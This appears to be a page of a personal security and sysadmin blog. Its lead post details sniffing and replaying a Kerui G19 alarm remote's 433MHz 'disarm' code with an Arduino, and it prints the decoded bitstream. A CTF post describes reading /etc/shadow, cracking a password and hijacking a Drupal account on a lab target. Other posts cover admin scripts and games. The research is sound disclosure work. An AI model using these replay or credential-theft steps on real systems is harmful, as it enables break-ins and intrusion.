The first part of my current project that I wanted to tackle, was the "RF hacking" part: capturing, analyzing, modifying and replaying the radio signals sent and received by a hardware device.

Home alarm systems (or home automation systems in general) often used one of two RF bands: 433MHz or 868Mhz. As far as I understand it, 433MHz is often used by lower end or cheaper systems; haven't figured out why just yet. In the case of the Kerui G19 alarm, the adverts from the get-go tell you it uses 433MHz for its communications.

Cracking open one of the remotes I find one basic IC in there, the HS1527 (datasheet). The datasheet calls it an "OTP encoder", but I haven't figured out what OTP stands for in this case. I know "OTP" as "One Time Password" and that's also what the datasheet hints at ("HS1527 hai a maximum of 20 bits providing up to 1 million codes.It can reduce any code collision and unauthorized code scanning possibilities.") but can't be that because the Kerui remotes send out the exact same code every time. HKVStar.com has a short discussion on the HS1527, calling it a "learning code" as opposed to a "fixed code" (e.g. PT2262), but the only difference I see is 'security through obscurity', because it simply provides a large address space. There is no OTP going on here!

The datasheet does provide useful information on how its bit patterns are generated and what they look like on the output. The four buttons on the remote are tied 1:1 to the K0 through K3 inputs, so even if HS1527 can generate 16 unique codes, the remote will only make four unless you're really fast. 

After that I spent a lot of time reading various resources on RF sniffing and on 433MHz communications. Stuff like LeetUpload's articles, this article on Random Nerd, and of course lots of information at Great Scott Gadgets. Based on my reading, I put together a nice shopping list:

And cue more learning! 

GQRX turns out to be quite user-friendly and while hard to master, isn't too hard to get a start with. It's even included with the Kali Linux distribution! Using GQRX I quickly confirmed that the remotes and control panel do indeed communicate around the 433MHz band, with the panel being at a slighly higher frequency than the remotes. With some tweaking and poking, I found the remote to use AM modulation without resorting to any odd trickery.

GQRX dilligently gave me a WAV file that can be easily inspected in Audacity. Inspecting the WAV files indicated that each button-press on the remote would send out multiple repeats of the same bitstream. Zooming into the individual bitstreams you can make out the various patterns in the signal, but I'd had problem matching it to the HS1527 datasheet for the longest of times. For starters, I never saw a preamble, I counted 25 bits instead of 20+4 (address+data) and the last 4 bits showed patterns that should only occur when >1 button was pressed. 

Then it hit me: that 25th bit is the preamble! The preamble is sent back-to-back with the preceding bitstream. Doh!

Just by looking at the GQRX capture in Audacity, I can tell that the address of this particular remote is 10000100001100110001 and that 0010 is the data used for the "disarm" signal. 

Time for the next part of this experiment; let's break out the Arduino! Again, the Arduino IDE turns out to be part of the Kali Linux distro! Awesome! Some Googling led me to Suat Özgür's RC-Switch library, which comes with a set of exemplary programs that work out-of-the-box with the 433Mhz transceivers I bought. 

Using the receiver and sniffing the "disarm" signal confirms my earlier findings:

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 9228,864,320,272,916,268,920,272,912,276,908,872,308,284,904,280,904,280,912,276,904,872,320,868,312,280,908,276,912,868,312,876,324,276,900,276,908,280,908,876,312,280,908,280,904,880,312,276,908,

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 14424,76,316,280,904,288,896,280,904,20,1432,36,1104,36,912,280,904,284,900,280,908,876,312,872,308,280,908,88,272,120,928,128,756,24,224,20,572,44,1012,32,800,24,188,32,964,68,1008,44,856,

The bitstream matches what I saw in Audacity. Using Suat's online parsing tool renders an image very similar to what we saw before.

So, what happens if we plug that same bitstream into the basic transmission program from RC-Switch? Let me show you!

If the YouTube clip doesn't show up: I press the "arm" button on the alarm system, while the Arduino in the backgrouns is sending out two "disarm" signals every 20 seconds. 

To sum it up: the Kerui G19 alarm system is 100% vulnerable to very simple replay attacks. If I were to install this system in my home, then I would never use the remote controls and I would de-register any remote that's tied to the system. 


kilala.nl tags: , ,

View or add comments (curr. 0)

New project: security assessment of a home security system

2016-08-24 20:58:00

(C) Kerui Secrui

Recently I've been seeing more and more adverts pop up for "cheap" and user-friendly home alarm systems from China. Obviously you're going to find them on Alibaba and MiniInTheBox, but western companies are also offering these systems and sometimes at elevated prices and with their own re-branding. Most of these systems are advertised as a set of a central panel, with GSM or Wifi connection, a set of sensors and a handful of remotes.

Between the apparent popularity of these systems and my own interest in further securing our home, I've been wanting to perform a security assessment of one of these Chinese home security systems. After suggesting the project to my employer, Unixerius happily footed the bill on such a kit, plus a whole bunch of extra lovely hardware to aid in the testing! 

For my first round of testing, I grabbed a Kerui G19 set from AliExpres

I'm tackling this assessment as a learning experience as I have no prior experience in most of the areas that I'll be attacking. I plan of having a go at the following:

The last item on the list is the only one I'm actually familiar with. The rest? Well, I'm looking forward to the challenge!

Has research like this been done before? Absolutely, I'm being far from original! One great read was Bored Hacker's "How we broke into your home". But I don't mind, as it's a great experience for me :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Passed my CEH and took part in a CTF

2016-07-05 20:10:00

Today was a day well spent!

This morning I passed my CEH examination in under 45 minutes. Bam-bam-bam, answers hammered out with time to spare for coffee on my way to Amstelveen. A few weeks back I'd started this course expecting some level of technical depth, but in the end I've concluded that CEH makes a nice entry-level course for managers or juniors in IT. One of my colleagues in the SOC had already warned me about that ;) I still had lots of fun with my fellow IT Gilde members, playing around during the evening-time classes set up in cooperation with TSTC.

Why go to Amstelveen? Because it's home to KPMG's beautiful offices, which is where I would take part in a CTF event co-organized by CQure! This special event served as a trial-run for a new service that KPMG will be offering to companies: CTF as a training event. Roughly twenty visitors were split across four teams, each tackling the same challenge in a dedicated VM environment. My team consisted mostly of pen-testing newbies, but we managed to make nice headway by working together and by coordinating our efforts through a whiteboard. 

This CTF was a traditional one, where the players are assumed to be attacking a company's infrastructure. All contestants were given VPN configuration data, in order to connect into the gaming environment. KPMG took things very seriously and had set up separate environments for each team, so we could have free reign over our targets. The introductory brief provided some details about the target, with regards to their web address and the specific data we were to retrieve. 

As I mentioned, our room was pretty distinct insofar that we were 90% newbies. Thus our efforts mostly consisted of reconnaissance and identifying methods of ingress. I won't go into details of the scenario, as KPMG intends to (re)use this scenario for other teams, but I can tell you that they're pretty nicely put together. They include scripts or bots that simulate end-user behaviour, with regards to email and browser usage. 

CQure and KPMG have already announced their follow-up to this year's CTF, which will be held in April of 2017. They've left me with a great impression and I'd love to take part in their next event!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Games I love(d): Stardew Valley

2016-05-01 09:22:00

A screenshot from The Mirror

While I might play games often, I don't play a multitude of games. I like sinking quite some time into games that are really good, instead of jumping to and fro. I often get suggestions for good games from the likes of Penny Arcade or other gaming blogs/comics. Case in point: I found out about 2015's indy hit Stardew Valley

I've never played Harvest Moon games, despite knowing they're pretty darn good. I've been wanting to get into it, but never did. Imagine my joy when I learned about Stardew Valley, the bastard lovechild of Harvest Moon, Animal Crossing and modern-day indy game and modding mentality. I'll let some reviews do the explaining: Ars Technica and PC Gamer.

Why do I love it so much? Mostly because:

It's hard to believe that all of it was made by a single person! Sure it took him four years, but still!


kilala.nl tags: ,

View or add comments (curr. 0)

Building the BoKS Puppet module

2016-04-20 20:35:00

Yesterday I published the BoKS Puppet module on Puppet Forge! So far I've sunk sixty hours into making a functional PoC, which installs and configures a properly running BoKS client. I would like to thank Mark Lambiase for offering me the chance to work on this project as a research consultant for FoxT. I'd also like to thank Ger Apeldoorn for his coaching and Ken Deschene for sparring with me. 

BoKS Puppet module at the Forge.

In case anyone is curious about my own build process for the Puppet module, I've kept a detailed journal over the past few months which has now been published as a paper on our website -> Building the BoKS Puppet module.pdf

I'm very curious about your thoughts on it all. I reckon it'll make clear that I went into this project with only limited experience, learning as I went :)


kilala.nl tags: , ,

View or add comments (curr. 0)

A very productive week: BoKS, Puppet and security

2016-04-17 00:28:00

I have had a wonderfully productive week! Next to my daily gig at $CLIENT, I have rebuilt my burner laptop with Kali 2016 (after the recent CTF event) and I have put eight hours into the BoKS Puppet module I'm building for Fox Technologies.  

The latter has been a great learning experience, building on the training that Ger Apeldoorn gave me last year. I've had a few successes this week, by migrating the module to Hiera and by resolving a concurrency issue I was having.

With regards to running Kali 2016 on the Lenovo s21e? I've learned that the ISO for Kali 2016 does not include the old installer application in the live environment. Thus it was impossible to boot from a USB live environment to install Kali on /dev/mmcblk1pX. Instead, I opted to reinstall Kali 2, after which I performed an "apt-get dist-upgrade" to upgrade to Kali 2016. Worked very well once I put that puzzle together.


kilala.nl tags: , ,

View or add comments (curr. 0)

CTF036 security event in Almere

2016-04-01 19:01:00

My notes from CTF036

A few weeks ago Almere-local consulting firm Ultimum posted on LinkedIn about their upcoming capture the flag event CTF036. Having had my first taste of CTF at last fall's PvIB event, I was eager to jump in again! 

The morning's three lectures were awesome!

The afternoon's CTF provided the following case (summarized): "De Kiespijn Praktijk is a healthcare provider whom you are hired to attack. Your goal is to grab as many of their medical record identifiers as you can. Based on an email that you intercepted you know that they have 5 externally hosted servers, 2 of which are accessible through the Internet. They also have wifi at their offices, with Windows PCs." The maximum score would be achieved by grabbing 24 records, for 240 points. 

I didn't have any illusions of scoring any points at all, because I still don't have any PenTesting experience. For starters, I decided to start reconnaissance through two paths: the Internet and the wifi. 

As you can see from my notes it was easy to find the DKP-WIFI-D (as I was on the D-block) MAC address, for use with Reaver to crack the wifi password. Unfortunately my burner laptop lacks both the processing power and a properly sniffing wlan adapter, so I couldn't get in that way. 

I was luckier going at their servers:

  1. Sanne's home directory, which actually contained a text file with "important patients". BAM! Three medical records!!
  2. The /etc/shadow file had an easily crackable password for user Henk. Unfortunately that username+password did not let me access the .15 server through SSH or Webmin.
  3. Sanne has a mailbox! In /home/vmail I found her mailbox and it was receiving email! I used the Drupal site's password recovery to access her Drupal account. 

I didn't find anything using Sanne's account on the Drupal site. But boy was I wrong! 16:00 had come and gone, when my neighbor informed me that I simply should have added q=admin to Sanne's session's URL. Her admin section would have given me access to six more patient records! Six! 

Today was a well-spent day! My first time using Metasploit! My first time trying WPA2 hacking! Putting together a great puzzle to get more and more access :) Thanks Ultimum! I'm very much looking forward to next year's CTF!


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Games I love(d): League of Legends

2016-03-20 16:41:00

The four LOL ribbons

The past two years I haven't been keeping this diary, so I've played a lot of games that I really enjoyed which I haven't written about. This's the first update in a series about games that I absolutely love (or loved) and which played an important role in my life. First up: League of Legends

LoL is the prime example of something I've often been "accused" of: "Thomas, you just can't do anything without taking it seriously!

Let's back it up a little bit... I'd heard of MOBA games before 2014: I knew of the Warcraft 3 spinoff DotA and I'd heard about LoL from my colleague Wim. They sounded like fun games, but as is often the case I never had time to give'm a try. In the summer of 2014 I started watching the LoL championships online. Season 3 was very exciting and I loved the "Road to Worlds" documentary. 

During our holiday in Austria I picked up another MOBA, on the iPad: Fates Forever. It was a very fun game and easy to pick up for newbies like myself. I got into the community and even designed a sweater for myself, with my favorite character Renwil. FF went offline in the fall of 2015, so I can't play the game anymore.

Despite watching LoL championships and playing FF I still kept away from actually playing LoL. As my mom once told me: “Whenever we’d take you somewhere new, I’d see you hanging around the sidelines, watching very intently. You were always trying to mentally grasp what was going on and how things worked. And you almost never dared to actually participate until you’d figured it out." And that's true, I was intimidated by LoL and didn't want to fsck up right from the start. 

By the end of December 2014 I had finished a long and hard certification process (RHCE) and I told myself: "This is it! I'm gonna take three months and do nothing except gaming!". That's when I dove in! And that's where the aforementioned accusation comes in ^_^

I didn't dick around with LoL! I decided that I was going to study hard to play a limited pool of characters that each fit two roles, so I could be of good use to any team I'd join for a game. Volibear was my very first character and I shelled out the money to buy him out-right. What's there not to love! A huge, friggin' polar bear with armor! I learned to play him in both toplane and the jungle. But my true love would become the support role, which is a role that suits my real life: I love being the one who supports his team, so they can win the day. Soraka is my all-time favorite character (my "main") and later on I also learned to play Janna, Annie, Lux and Morgana.

To be honest, I feel that I got pretty good. I found a few friends with whom I could play great games and I often got recognized as a valuable contributor. Over the three to four months which I played the game, I worked myself up to level 30 (to most people the "real" start of the game) and I was awared all four "honor ribbons" (shown top-left). I'd pore over patch notes and study pro games as well as replays of my own team's games. It was a lot of hard work, but I had an absolute blast! 

By April of 2015 the time came for me to return to studying. I started my Oracle studies by then and I also got some extra work. I said my farewells to my friends, most importantly Hedin (who played as Limerick / Dovetail) from the Farroe Islands. He was an absolute joy to play with! I never did start Ranked play, so I don't know how good I could've gotten. I'm sure that I was only on the very first step of properly learning League of Legends.


kilala.nl tags: ,

View or add comments (curr. 1)

Passed my NACA examination

2016-03-16 08:02:00

NACA logo

With many thanks to Nexpose consultant Mark Doyle for his trust in me and his coaching and with thanks to my colleagues at $CLIENT for offering me the chance to learn something new!

This morning I passed my NACA (Nexpose Advanced Certified Administrator) examination, with an 85% score.

While preparing for the exam I searched online to find stories of test takers, describing their experiences with the NCA and NACA exams. Unfortunately I couldn't really find any, aside from one blogpost from 2012. 

For starters, the exam will be taken through Rapid7's ExpertTracks portal. If you're going to take their test, you might as well register beforehand. Purchasing the voucher through their website proved to be interesting: I ran into a few bugs which prevented my order from being properly processed. With the help of Rapid7's training department, things were sorted out in a few days and I got my voucher.

The examination site is nice enough, though there are two features that I missed while taking the test:

  1. There is no option to mark your questions for review, a feature most computer-based exams provide.
  2. Even if you could mark your questions, there apparently is no index page that allows you to quickly jump to specific questions. 

I made do with a notepad (to mark the questions) and by editing the URL in the address bar, to access the questions I wanted to review. 

The exam covers 75 questions, is "open book" and you're allowed to take 120 minutes. I finished in 44 minutes, with an 85% score (80% needed to pass). None of the questions struck me as badly worded, which is great! No apparent "traps" set out to trick you. 


kilala.nl tags: , ,

View or add comments (curr. 2)

Running Jira locally on Mac OS X

2016-03-10 19:39:00

Jira on OS X

It's no secret that I'm a staunch lover of Atlassian's Jira, a project and workload management tool for DevOps (or agile) teams. I was introduced to Jira at my previous client and I've introduced it myself at $CURRENTCLIENT. The ease with which we can outline all of our work and divide it among the team is wonderful and despite not actually using "scrum", we still reap plenty of benefits!

Unfortunately I couldn't get an official Jira project setup on $CUSTOMER's servers, so instead I opted for a local install on my Macbook. Sure, it foregoes a lot of the teamwork benefits that Jira offers, but at least it's something. Besides, this way I can use Jira for two of my other projects as well! 

Getting Jira up and running with a standalone installation on my Mac took a bit of fiddling. Even Atlassian's own instructions were far from bullet proof.

Here's what I did:

  1. Download the OS X installer for Jira. It comes as a .tgz.
  2. Extract the installer wherever you'd like; I even kept it in ~/Downloads for the time being.
  3. Make a separate folder for Jira's contents, like ~/Documents/Jira.
  4. Ensure that you have Java 8 installed on your Mac. Get it from Oracle's website.
  5. Browse to the unpacked Jira folder and find the script "check-java.sh". You'll need to change one line so it reads as follows, otherwise Jira won't boot: "$_RUNJAVA" -version 2>&1 | grep "java version" | (
  6. Find the files "start-jira.sh" and "stop-jira.sh" and add the following lines at their top:
export PATH="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin:$PATH"
export JAVA_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JRE_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JIRA_HOME="/Users/thomas/Documents/Jira"

You should now be able to startup Jira, from the Terminal, by running the "start-jira.sh" script. The best thing is that Jira handles the sleep mode a laptop just fine (at least it does so on OS X), so you can safely forget about your Terminal session and close it. I've had Jira run for days on end, with many sleeps and resumes each day!

Upgrading Jira should be as easy as downloading the latest archive (step 1) and then repeating steps 5 and 6 on the files from the new installation. All Jira data lives outside of the installation path, thanks to step 3.

EDIT: If you ever need to move your Jira data directory elsewhere (or rename it), then you'll need to re-adjust the setting of JIRA_HOME in the shell scripts. You will also need to change the database path in dbconfig.xml (which lives inside your Jira data directory). 


kilala.nl tags: , ,

View or add comments (curr. 0)

Using the Nexpose API in Linux shell scripts to bulk-create users

2016-03-02 15:09:00

The past few weeks I've spent at $CLIENT, working on their Nexpose virtual appliances. Nexpose is Rapid7's automated vulnerability scanning tool, which may also be used in unison with Rapid7's more famous product: Metasploit. It's a pretty nice tool, but it certainly needs some work to get it all up and running in a large, corporate environment.

One of the more practical aspects of our setup, is the creation of user accounts in Nexpose's web interface. Usually, you'd have to click a few times and enter a bunch of textfields for each user. This gets boring for larger groups of users, especially if you have more than one Security Console host. To make our lives just a little easier, we have at least setup the hosts to authenticate against AD.

I've fiddled around with Nexpose's API this afternoon, and after a lot of learning and trying ("Van proberen ga je het leren!" as I always tell my daughter) I've gotten things to work very nicely! I now have a basic Linux shell script (bash, but should also work in ksh) that creates user accounts in the Nexpose GUI for you!

Below is a small PoC, which should be easily adjusted to suit your own needs. Enjoy!

=====================================

#!/bin/bash
 
# In order to make API calls to Nexpose, we need to setup a session.
# A successful login returns the following:
# <LoginResponse success="1" session-id="F7377393AEC8877942E321FBDD9782C872BA8AE3"/>
 
NexposeLogin() {
        NXUSER=""
        NXPASS=""
        NXSERVER="127.0.0.1"
        NXPORT="3780"
        API="1.1"
        URI="https://${NXSERVER}:${NXPORT}/api/${API}/xml"
        NXSESSION=""
 
        echo -e "\n===================================="
        echo -e " LOGGING IN TO NEXPOSE, FOR API CALLS."
        echo -e "\n===================================="
        echo -e "Admin username: \c"; read NXUSER
        echo -e "Admin password: \c"; read NXPASS
 
        LOGIN="<LoginRequest synch-id='0' password='${NXPASS}' user-id='${NXUSER}'></LoginRequest>"
 
        export NXSESSION=$(echo "${LOGIN}" | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $4}')
}
 
# Now that we have a session, we can make new users.
#    You will need to know the ID number for the desired authenticator.
# You can get this with: <UserAuthenticatorListingRequest session-id='...'/>
#    A user request takes the following shape, based on the API v1.1 docu.
#  <UserSaveRequest session-id='...'>
#  <UserConfig id="-1" role-name="user" authsrcid="9" authModule="LDAP" name="apitest2"
#   fullname="Test van de API" administrator="0" enabled="1">
#  </UserConfig>
#  </UserSaveRequest>
# On success, this returns:
#  <UserSaveResponse success="1" id="41">
# </UserSaveResponse>
 
NexposeCreateUser() {
        NEWUSER="${1}"
        SUCCESS="0"
        NXAUTHENTICATOR="9" # You must figure this out from Nexpose, see above
        NXROLE="user"
        SCRATCHFILE="/tmp/$(basename ${0}).temp"
 
        echo "<UserSaveRequest session-id='${NXSESSION}'>" > ${SCRATCHFILE}
        echo "<UserConfig id='-1' role-name='${NXROLE}' authsrcid='${NXAUTHENTICATOR}' authModule='LDAP' name='${NEWUSER}' fullname='${NEWUSER}' administrator='0' enabled='1'>" >> ${SCRATCHFILE}
        echo "</UserConfig>" >> ${SCRATCHFILE}
        echo "</UserSaveRequest>" >> ${SCRATCHFILE}
 
        SUCCESS=$(cat ${SCRATCHFILE} | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $2}')
        [[ ${SUCCESS} -eq 0 ]] && logger ERROR "Failed to create Nexpose user ${NEWUSER}."
        rm ${SCRATCHFILE}
}
 
NexposeLogin
NexposeCreateUser apitest1

kilala.nl tags: , ,

View or add comments (curr. 0)

My first online gaming experience: Darkscapes MUD

2016-01-06 06:04:00

Fifteen years ago I graduated college at Hogeschool Utrecht. Before I got that far, I spent four years studying electronics, programming, telecommunications and more. I also had a lot of fun with my classmates! At the time I was already familiar with role playing as well as trading card games (D&D, Magic, etc), but my classmate Erik introduced me to the joys of Warhammer 40k and World of Darkness games. 

My biggest time waster in first and second year was something entirely different though: it was my introduction to online gaming, as well my first MMORPG! A few students at HvU ran a MUD (multi-user dungeon) on a school server and I spent hours questing and talking to other players. It was a grand experience, especially since the text-based interface was light enough to even work on a very slow Internet connection. Through the game I went on to meet Maya Deva, a woman who was absolutely dedicated to her D&D games and who went on to work for TSR a little while. 

Over the years I've fondly remembered that MUD, whose name escaped me. I'd always wondered whether it was still running on some hidden-away server somewhere.

Turns out that it has! Much to my surprise, my ITGilde colleague Mark was one of the admins of that MUD, which was called DarkScapes. It's not the same instance I used to play in (my account "Beowulf" was gone), but it's a rebuild based off old backups. Still, it was great to find this relic of my past and to walk that world around again!


kilala.nl tags: ,

View or add comments (curr. 0)

Changing users' passwords in Active Directory 2016, from anywhere

2016-01-04 09:28:00

As part of an ongoing research project I'm working on, I've had the need to update an end-users' password in Microsoft's Active Directory. Not from Windows, not through "ADUC" (AD Users and Computers), but from literally anywhere. Thankfully I stumbled upon this very handy lesson from the University of Birmingham. 

I've tweaked their exemplary script a little bit, which results in the script shown at the bottom of this post. Using said script as a proof of concept I was able to show that the old-fashioned way of using LDAP to update a user's password in AD will still work on Windows Server 2016 (as that's the target server I run AD on). 

 

Called as follows:

$ php encodePwd.php user='Pippi Langstrumpf' newpw=Bora38Sr > Pippi.ldif

Resulting LDIF file:

$ cat Pippi.ldif 
dn: CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl
changetype: modify
replace: unicodePwd
unicodePwd:: IgBOAG8AggBhQDMAOQBGAHIAIgA=

Imported as follows:

$ ldapmodify -f Pippi.ldif -H ldaps://win2016.broehaha.nl -D 'CN=Administrator,CN=Users,DC=broehaha,DC=nl' -W
Enter LDAP Password: 
modifying entry "CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl"

Once the ldapmodify has completed, I can login to my Windows Server 2016 host with Pippi's newly set password "Bora38Sr".

 



<?php

function EncodePwd($pw) {
  $newpw = '';
  $pw = "\"" . $pw . "\"";
  $len = strlen($pw);
  for ($i = 0; $i < $len; $i++)
      $newpw .= "{$pw{$i}}\000";
  $newpw = base64_encode($newpw);
  return $newpw;
}

 if($argc > 1) {
	foreach($argv as $arg)  {
	list($argname, $argval) = split("=",$arg);
	$$argname = $argval;
	}
  }

  $userdn = 'CN='.$user.',CN=Users,DC=broehaha,DC=nl';

  $newpw64 = EncodePwd($newpw);

  $ldif=<<<EOT
dn: $userdn
changetype: modify
replace: unicodePwd
unicodePwd:: $newpw64
EOT;

  print_r($ldif);

?>

kilala.nl tags: , ,

View or add comments (curr. 0)

Integrating BoKS and Windows Active Directory

2015-12-18 10:59:00

As part of an ongoing research project for Fox Technologies I had a need for a private Windows Active Directory server. Having never built a Windows server, let alone a domain controller, it's been a wonderful learning experience. The following paragraphs outline the process I used to build a Windows AD KDC and how I set up the initlal connections from the BoKS hosts.

 

Windows server setup

I run all my tests using the Parallels Desktop virtualization product. The first screenshot below will show five hosts running concurrently on my Macbook Air: a Windows Server 2012 host and four hosts running RHEL6 (BoKS master, replica and two clients). 

Even installing Windows Server 2012 proved to be a hassle, insofar that the .ISO image provided by Microsoft (for evaluation purposes) appears to be corrupt. Every single attempt to install resulted in error code 0x80070570 halfway through. This is a known issue and the only current workaround appears to lie in using an alternative ISO image provided by a good samaritan. Of course, one ought to be leery about using installation software not provided by the actual vendor, so caveat emptor

Once the installation has completed, setup basic networking as desired. Along the way I opted to disable IPv6 as this would make the setup and troubleshooting of Kerberos a bit more complicated. 

Next up, it's time to add the appropriate Roles to the new Windows server. This is done through Windows Server Manager, from the "Manage" menu one should pick "Add roles and features". Add:

This tutorial by Rackspace quickly details how to setup the Domain Services. In my case I set up the forest "broehaha.nl" which matches the name of the domain (and my LDAP directory on Linux). Setting up the CA (certificate authority) requires stepping through a wizard, using the default values provided. 

BoKS will also require the installation of the (deprecated) role Identity Manager for Unix. Microsoft provide excellent instructions on how to install these features on Windows 2012, through the command line. In short, the commands are (NOTE the disabling of NIS):

Dism.exe /online /enable-feature /featurename:adminui /all
Dism.exe /online /disable-feature /featurename:nis /all Dism.exe /online /enable-feature /featurename:psync /all

 

The Windows AD KDC should be in sync with the time as running on the Linux hosts. Setup NTP to use the same NTP servers as follows:

w32tm /config /manualpeerlist:pool.ntp.org /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time

 

Export the root CA certicate by running:

certutil -ca.cert windows_ca.crt >windows_ca.txt
certutil -encode windows_ca.crt windows_ca.cer

 

You may now SCP the windows_ca.cer file to the various Linux hosts (for example by using pscp, from the Putty team). 

Now it's time to put some data into DNS and Active Directory. Using the "AD Users and Computers" tool, create Computer records for all BoKS hosts. These records will not automatically include the full DNS names, as these will be filled at a later point in time. Using the DNS tool, create a forward lookup zone for your domain (broehaha.nl in my case) as well as a reverse lookup zone for your IP range (10.211.55.* for me). In the forward zone create A records for your Windows and your Linux hosts (the wizard can automatically create the reverse PTR records). See below screenshots for some examples.

 

 

Linux / BoKS server setup

My Linux hosts were already installed before, as part of my BoKS testing environment. All hosts run RHEL6 and BoKS 7.0. The master server has Apache and OpenLDAP running for my Yubikey testing environment

First order of business is to ensure that the Linux hosts all use the Windows DNS server. Best way to arrange this is to ensure that /etc/sysconfig/network-scripts/ifcfg-eth0 (adjust for the relevant interface name) has entries for the DNS server and search domains. In my case it's as follows, with DNS2 being my default DNS for everything outside of my testing environment):

DNS1=10.211.55.70
DNS2=10.211.55.1
DOMAIN=broehaha.nl

 

As was said, NTP should be running to have time synchronization among all servers involved.

Your Kerberos configuration file should be adjusted to match your AD domain:

[logging]
 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

[libdefaults]
 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d

 default_realm = BROEHAHA.NL
 forwardable = true
[realms]
 BROEHAHA.NL = {
  kdc = windows.broehaha.nl
  admin_server = windows.broehaha.nl
 }

[domain_realm]
 .broehaha.nl = BROEHAHA.NL

 

If so desired you may test the root CA certificate from the Windows server, after which the certificate may be installed:

openssl x509 -in /home/thomas/windows_ca.cer -subject -issuer -purpose
cp /home/thomas/windows_ca.cer /etc/openldap/cacerts/
cacertdir_rehash /etc/openldap/cacerts

 

You should be able to test basic access to AD as follows:

ldapsearch -v -x -H ldaps://windows.broehaha.nl:636 -D "CN=Administrator,CN=Users,DC=BROEHAHA,DC=NL" -b "DC=BROEHAHA,DC=NL" -W
ldapsearch -vv -Y GSSAPI -H ldap://windows.broehaha.nl -b "DC=BROEHAHA,DC=NL"

 

Now you may join your Linux host(s) to the Windows AD domain:

kinit bokssync@BROEHAHA.NL Password for bokssync@BROEHAHA.NL:
adjoin join -K windows.broehaha.nl BROEHAHA.NL Administrator@BROEHAHA.NL

 

If you now use "AD Users and Computers" on the Windows server, you'll notice that the fully qualified DNS name of the Linux host has been filled in. 

Basic AD connectivity has now been achieved. We'll start putting it to good use in an upcoming tutorial.


kilala.nl tags: , ,

View or add comments (curr. 0)

In-between assignments? What an opportunity!

2015-11-23 14:38:00

It's been two weeks now since I've left my friends and colleagues at my previous assignment. I didn't have a new gig lined up, so for now I'm "in-between assignments". Am I having a dreary time and am I scrambling for something new? Maybe surprisingly, I'm not! I've been busier than ever!

I'd argue that some downtime between jobs is an excellent opportunity! 

  1. Learn something new
  2. Meet new people
  3. Deflate

 

Learn something new

Now is your chance to finally get started on all those things you've been meaning to learn and study! Make sure to plan a few hours every day to spend on research and studies. This will also help you maintain your workday rhythm. 

 

Meet new people

Of course you're going job hunting! Putting that aside though, I've found it tremendous to also go and meet people in my business just for the heck of it. Some would call this networking, I just call it fun :)

Why not visit one of your industry's convention, now that you have the time? Or use Meetup.com to find social gatherings that look interesting or beneficial. Every week there's something you could help out with or learn about.

 

Deflate

And you know what? Relish your downtime! Get some exercise, go for a walk, enjoy the scenery. Feeling ambitious and feeling the urge to start running? Give the famous "Couch to 5k" schedule a shot! Not thinking about work a few hours may help you a bit in pushing harder when you need to!

 

What have I been doing?

I've spent a few days learning a new programming language (Python in my case) by signing up for Codecademy. I've also spent a few days learning about MFA tokens and on integrating those with software I'm already familiar with. And now I'm also hitting the books on Oracle and SQL. 

I've hit the Blackhat Europe convention and learned a lot of new things. I'll also be meeting with people from a big-name college and with an IT service provider. Both talks could perhaps lead to something in the future, but for now I simply want to learn about their activities.  

 

And after all that hard work-that's-not-actually-work? I'm deflating by taking some walks around town and by playing a game or two. I really ought to thank my employer for this great "work-cation".


kilala.nl tags: ,

View or add comments (curr. 0)

Integrating FoxT BoKS ServerControl with Yubikey (MFA) authentication

2015-11-17 10:03:00

As promised, I’ve put some time into integrating the Yubikey Neo that I was gifted with Fox Technologies BoKS.  For those who are not familiar with BoKS, here’s a summary I once wrote. I’ve always enjoyed working with BoKS and I do feel that it’s a good solution to the RBAC-problems we may have with Linux and Windows servers. So when I was gifted a Yubikey last week, I couldn’t resist trying to get it to work with BoKS.

My first order of business was to set up a local, private Yubikey validation infrastructure. This was quickly followed by using an LDAP server to host both user account data and Yubikey bindings (like so). And now follows the integration with BoKS!

 

Yubikey and BoKS: it takes a little work

The way I see it, there’s at least three possible integration solutions that us “mere mortals” may achieve. There are definitely other ways, but they require access to the BoKS sources which we won’t get (like building a custom authenticator method that uses YKCLIENT).

  1. Adjust your software to use both Yubikey and then PAM to use BoKS.
  2. Adjust your software to use PGP/SSH keys stored on Yubikey.
  3. Adjust your software to authenticate against Kerberos, which in turn uses Yubikey OTP. BoKS allows Kerberos authentication by default.

Putting this into a perspective most of us feel comfortable with, SSH, this would lead to:

  1. Run a second SSH daemon next to the BoKS-provided SSH. This second daemon will only allow Yubikey+password MFA logins and is only accessible to a select group of people. This requires the definition of a custom access method and some PAM customizations.
  2. A solution like this, with PGP/SSH keys.
  3. Using BoKS-sshd, together with the Kerberos authentication method defined by BoKS

In my testing environment I’ve gotten solution #1 to work reliably. The next few paragraphs will describe my methods.

 

Requirements

The following assumes that you already have:

All the changes described will need to be made on all your BoKS systems. The clients running the special SSH daemon with Yubikey support will need the PAM files as well as all the updates to the BoKS configuration files. The master and replicas will technically not need the changes you make to the SSH daemon and the PAM files, unless they will also be running the daemon. Of course, once you've gotten it all to run correctly, you'd be best off to simply incorporate all these changes into your custom BoKS installation package!

 

Let’s build a second daemon

BoKS provides it’s own fork of the OpenSSH daemon and for good reason! They expanded upon its functionality greatly, by allowing much greater control over access and fine-grained logging. With BoKS you can easily allow someone SCP access, without allowing shell access for example. One thing FoxT did do though, is hard-disable PAM for this custom daemon. And that makes it hard to use the pam_yubico module. So what we’ll do instead, is fire up another vanilla OpenSSH daemon with custom settings.

